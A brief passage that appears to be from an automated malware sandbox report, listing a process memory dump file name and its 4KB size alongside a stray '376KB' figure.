                                                        376KB

                                                      • memory/2840-39-0x00000000001D0000-0x00000000001D1000-memory.dmp

                                                        Filesize

                                                        4KB